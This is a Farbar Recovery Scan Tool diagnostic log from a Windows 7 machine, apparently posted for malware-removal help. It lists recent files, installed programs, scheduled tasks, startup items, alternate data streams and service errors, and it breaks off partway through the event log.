2014-10-19 12:11 - 2014-10-19 12:11 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-19 12:11 - 2014-10-19 12:11 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-19 12:11 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-19 12:11 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-19 01:07 - 2014-10-19 01:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-10-16 09:12 - 2014-09-28 17:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 09:12 - 2014-06-18 15:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-16 09:11 - 2014-09-17 19:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 09:11 - 2014-09-17 18:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-16 09:11 - 2014-09-12 18:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 09:11 - 2014-09-12 18:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-16 09:11 - 2014-09-03 22:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-16 09:11 - 2014-09-03 22:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-16 09:11 - 2014-07-16 19:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-16 09:11 - 2014-07-16 18:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-16 09:11 - 2014-07-16 18:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-16 09:11 - 2014-07-16 18:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-16 09:11 - 2014-07-16 18:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-16 09:11 - 2014-07-16 18:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-07 12:50 - 2014-10-27 17:46 - 01121575 _____ () C:\Windows\WindowsUpdate.log
2014-10-04 13:45 - 2014-10-23 11:58 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\CDisplayEx
2014-10-04 13:45 - 2014-10-04 13:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CDisplayEx
2014-10-04 13:45 - 2014-10-04 13:45 - 00000000 ____D () C:\Program Files\CDisplayEx
2014-10-04 11:38 - 2014-10-21 15:24 - 00000000 ____D () C:\Users\McLain\Documents\ebay2
2014-10-04 02:13 - 2014-10-04 03:31 - 00000000 ____D () C:\Users\McLain\Documents\characters
2014-10-01 12:22 - 2014-09-24 19:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-01 12:22 - 2014-09-24 18:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 01:26 - 2012-12-02 19:52 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-28 01:21 - 2011-07-09 00:30 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-28 01:03 - 2012-06-05 15:18 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\vlc
2014-10-27 20:21 - 2011-07-09 00:30 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-27 18:35 - 2013-10-18 07:19 - 00000000 ____D () C:\Users\McLain\Documents\Sourcefield
2014-10-27 17:49 - 2009-07-13 21:45 - 00009920 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-27 17:49 - 2009-07-13 21:45 - 00009920 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-27 17:42 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-27 17:41 - 2011-05-16 07:10 - 00000389 _____ () C:\Windows\Brownie.ini
2014-10-27 16:33 - 2011-05-15 21:11 - 00000000 ____D () C:\Users\McLain
2014-10-27 07:01 - 2009-07-13 19:34 - 00000215 _____ () C:\Windows\system.ini
2014-10-27 03:04 - 2011-06-10 22:20 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Skype
2014-10-27 01:33 - 2011-07-09 00:30 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-27 01:01 - 2013-05-16 12:57 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-10-27 00:57 - 2011-07-09 00:30 - 00000000 ____D () C:\Users\McLain\AppData\Local\Google
2014-10-27 00:56 - 2014-02-02 23:42 - 00000000 ____D () C:\Program Files (x86)\RegSeeker
2014-10-27 00:55 - 2014-01-15 18:09 - 00000000 ____D () C:\ProgramData\TEMP
2014-10-26 15:12 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-10-25 00:16 - 2011-05-19 23:30 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-24 01:12 - 2009-08-05 11:14 - 00000000 ____D () C:\Windows\Panther
2014-10-24 00:11 - 2009-07-13 20:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-24 00:08 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-10-23 23:43 - 2013-07-18 21:16 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-10-23 23:43 - 2009-07-13 21:45 - 04889728 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-23 09:59 - 2011-05-15 21:15 - 00059824 _____ () C:\Users\McLain\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-21 00:14 - 2009-07-13 20:20 - 00000000 __RHD () C:\Users\Default
2014-10-20 17:38 - 2009-07-13 22:13 - 00782228 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-20 01:17 - 2014-07-10 12:03 - 00000000 ____D () C:\Users\McLain\AppData\Local\Adobe
2014-10-20 01:15 - 2012-12-02 19:52 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-10-20 01:15 - 2012-10-11 10:33 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-10-20 01:15 - 2011-05-16 07:14 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-10-19 01:33 - 2011-07-12 23:13 - 00000000 ____D () C:\Program Files\WinRAR
2014-10-19 01:07 - 2011-09-22 03:53 - 00000000 ____D () C:\ProgramData\Apple Computer
2014-10-19 01:07 - 2011-09-22 03:53 - 00000000 ____D () C:\Program Files (x86)\QuickTime
2014-10-19 01:04 - 2011-07-12 23:13 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-19 01:04 - 2011-07-12 23:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-18 23:41 - 2012-12-22 14:08 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon
2014-10-18 23:36 - 2012-07-29 02:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe
2014-10-18 23:36 - 2010-11-02 09:57 - 00000000 ____D () C:\Program Files (x86)\Adobe
2014-10-18 23:35 - 2012-08-23 23:00 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-10-18 23:35 - 2010-11-02 09:57 - 00000000 ____D () C:\ProgramData\Adobe
2014-10-18 23:34 - 2011-05-15 21:18 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Adobe
2014-10-18 23:32 - 2014-04-19 00:43 - 00000000 ____D () C:\Program Files (x86)\AbiWord
2014-10-18 10:08 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-17 20:16 - 2011-07-09 00:30 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-17 20:16 - 2011-07-09 00:30 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 03:11 - 2014-05-28 03:22 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-17 03:00 - 2011-06-25 19:14 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 15:53 - 2011-08-28 11:00 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

Some content of TEMP:
====================
C:\Users\McLain\AppData\Local\Temp\avgnt.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-26 15:03

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-10-2014
Ran by McLain at 2014-10-28 01:52:17
Running from C:\Users\McLain\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avira Desktop (Disabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Desktop (Disabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 1.2.0 - Hewlett-Packard) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 15.0.0.293 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
AGEIA PhysX v6.10.25 (HKLM-x32\...\{7104189A-C592-4A56-AC9E-7C0CA135DA3C}) (Version: 6.10.25 - AGEIA Technologies, Inc.)
AI Manager (HKLM-x32\...\{4AF95DE2-B54D-4C3F-9494-FD3B558E2C2D}) (Version: 1.08.07 - ASUSTeK)
AMD USB Filter Driver (x32 Version: 1.0.15.94 - Advanced Micro Devices, Inc.) Hidden
ASUS Backup Wizard (HKLM-x32\...\{124C9BD0-8C52-40AB-8238-0605703B1C28}) (Version: 1.00.09 - ASUSTeK Computer Inc.)
ASUS PCE-N10 WLAN Card Utilities & Driver (HKLM-x32\...\{556BEFE2-30FF-4113-98F4-01234396DF2B}) (Version: 1.0.0.9 - )
ASUS PCE-N53 WLAN Card Utilities & Driver (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 1.0.0.8 - ASUS)
ASUS VIBE (HKLM-x32\...\ASUS VIBE) (Version: 1.0.188 - Ecareme, Inc.)
ASUSUpdate (HKLM-x32\...\{587178E7-B1DF-494E-9838-FA4DD36E873C}) (Version: 7.18.03 - ASUSTeK Computer Inc.)
ATI Catalyst Install Manager (HKLM\...\{0C798FBB-2BA6-D113-C055-936965550F33}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Avira (HKLM-x32\...\{dc9a688a-12cb-4a22-b449-23d849d01dc7}) (Version: 1.1.24.28609 - Avira Operations GmbH & Co. KG)
Avira (x32 Version: 1.1.24.28609 - Avira Operations GmbH & Co. KG) Hidden
Avira Free Antivirus (HKLM-x32\...\Avira AntiVir Desktop) (Version: 14.0.7.306 - Avira)
Best Buy pc app (Version: 3.1.1.0 - Best Buy) Hidden
Best Buy pc app (x32 Version: 3.1.1.0 - Best Buy) Hidden
bl (x32 Version: 1.0.0 - Your Company Name) Hidden
Brother HL-2040 (HKLM-x32\...\{03F595F6-B733-4A29-86BC-7C055D977D7C}) (Version: 1.00 - Brother)
ccc-core-static (x32 Version: 2010.0210.2206.39615 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.19 - Piriform)
CDisplayEx 1.10.29 (HKLM\...\CDisplayEx_is1) (Version: - Progdigy Software S.A.R.L.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DjVuLibre DjView 3.5.25.4+4.9.2 (HKLM-x32\...\DjVuLibre+DjView) (Version: 3.5.25.4+4.9.2 - DjVuZone)
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
ImagXpress (x32 Version: 7.0.74.0 - Nero AG) Hidden
LogixPro-500 PLC Simulator (HKLM-x32\...\LogixPro 500 PLC Simulator_is1) (Version: - TheLearningPit)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft PowerPoint Viewer (HKLM-x32\...\{95140000-00AF-0409-0000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 33.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 33.0 (x86 en-US)) (Version: 33.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB973685) (HKLM-x32\...\{859DFA95-E4A6-48CD-B88E-A3E483E89B44}) (Version: 4.30.2107.0 - Microsoft Corporation)
neroxml (x32 Version: 1.0.0 - Nero AG) Hidden
ph (x32 Version: 1.0.0 - Your Company Name) Hidden
Photo Common (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Platform (x32 Version: 1.34 - VIA Technologies, Inc.) Hidden
PxMergeModule (x32 Version: 1.00.0000 - Your Company Name) Hidden
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
RangeMax Wireless-N USB Adapter WN111v2 (HKLM-x32\...\InstallShield_{1C0E9C6B-D4D5-4D3C-8A10-F10A3E7BEEA5}) (Version: 3.0.0.3 - NETGEAR)
Readiris Pro 10 (HKLM-x32\...\{14D08502-FEE4-40E5-90D3-8A967A1D8BA2}) (Version: - )
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.88.617.2014 - Realtek)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.18 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.18.106 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
WN111v2 (x32 Version: 3.0.0.3 - NETGEAR) Hidden
Ys Origin (HKLM-x32\...\Steam App 207350) (Version: - Nihon Falcom)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

==================== Restore Points =========================

26-10-2014 22:10:40 Scheduled Checkpoint
27-10-2014 07:47:54 avast! antivirus system restore point
27-10-2014 07:53:09 Removed GeekBuddy.
27-10-2014 08:32:06 Removed ebi.BookReader3J
27-10-2014 23:24:15 zoek.exe restore point

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2014-10-27 07:00 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {38B69515-75EE-45F7-AADF-BA4ECB7497EC} - System32\Tasks\Game_Booster_AutoUpdate => C:\Program Files (x86)\IObit\Game Booster 3\AutoUpdate.exe
Task: {4F7521E0-5030-4229-81A9-3C590C28B238} - System32\Tasks\ASUS\ASUS Update Checker => C:\Program Files (x86)\ASUS\ASUSUpdate\UpdateChecker\UpdateChecker.exe [2009-12-28] (ASUSTeK Computer Inc.)
Task: {5527822D-B79C-407A-A90B-8726D2CC0D34} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.)
Task: {5DC93231-81D9-4BA6-9F03-8C1A0A73223B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-10-23] (Piriform Ltd)
Task: {AD27FE19-DD71-4A43-8B11-5116A7CE348F} - System32\Tasks\ASUS\ASUS RegRun Loader => C:\Program Files (x86)\ASUS\AASP\1.00.97\AsLoader.exe [2009-12-23] (ASUSTeK Computer Inc.)
Task: {B20A35D4-ADE1-4EAD-9C5E-5C68779655B7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.)
Task: {DAF6AA24-3111-4D7D-BA1C-EB27CF111CC9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-10-20] (Adobe Systems Incorporated)
Task: {DFC4F727-6E50-455B-A97E-BC10E69CFFE0} - System32\Tasks\{512B4F1F-A37C-4F6C-8D18-466D7A964A4D} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2014-07-24] (Skype Technologies S.A.)
Task: {F82B5156-20D3-41D7-B836-D98942D48ABA} - System32\Tasks\ASUS\AsBackupWizard_Run => C:\Program Files (x86)\ASUS\AsBackupWizard\AsRunBkWizardHelper.exe [2010-04-23] (ASUSTeK Computer Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2011-06-14 23:02 - 2008-11-11 05:23 - 00027648 _____ () C:\Windows\System32\sso2ml6.dll
2013-03-14 09:38 - 2012-03-21 06:48 - 00184320 _____ () C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:5C321E34
AlternateDataStreams: C:\ProgramData\TEMP:F25DDE13
AlternateDataStreams: C:\Users\McLain\Local Settings:f086wSl4AGfGJDPZoQwtRUAX3
AlternateDataStreams: C:\Users\McLain\AppData\Local:f086wSl4AGfGJDPZoQwtRUAX3
AlternateDataStreams: C:\Users\McLain\AppData\Local\Application Data:f086wSl4AGfGJDPZoQwtRUAX3

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: AMD External Events Utility => 2
MSCONFIG\Services: Device Handle Service => 2
MSCONFIG\Services: GeekBuddyRSP => 2
MSCONFIG\Services: jswpsapi => 3
MSCONFIG\Services: RalinkRegistryWriter => 2
MSCONFIG\Services: RealtekSE => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ASUS PCE-N53 WLAN Control Center.lnk => C:\Windows\pss\ASUS PCE-N53 WLAN Control Center.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^NETGEAR WN111v2 Smart Wizard.lnk => C:\Windows\pss\NETGEAR WN111v2 Smart Wizard.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start GeekBuddy.lnk => C:\Windows\pss\Start GeekBuddy.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: HDAudDeck => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
MSCONFIG\startupreg: Logitech Download Assistant => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RunAIShell => C:\Program Files (x86)\ASUS\AI Manager\AsShellApplication.exe
MSCONFIG\startupreg: SansaDispatch => C:\Users\McLain\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun

========================= Accounts: ==========================

Administrator (S-1-5-21-1721771813-3942891954-2793525010-500 - Administrator - Disabled)
Guest (S-1-5-21-1721771813-3942891954-2793525010-501 - Limited - Disabled)
McLain (S-1-5-21-1721771813-3942891954-2793525010-1001 - Administrator - Enabled) => C:\Users\McLain

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================

System errors:
=============
Error: (10/27/2014 05:42:32 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Client Virtualization Handler service depends on the Application Virtualization Client service which failed to start because of the following error:
%%1068

Error: (10/27/2014 05:42:32 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Application Virtualization Client service depends on the Application Virtualization Service Agent service which failed to start because of the following error:
%%2

Error: (10/27/2014 05:42:26 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
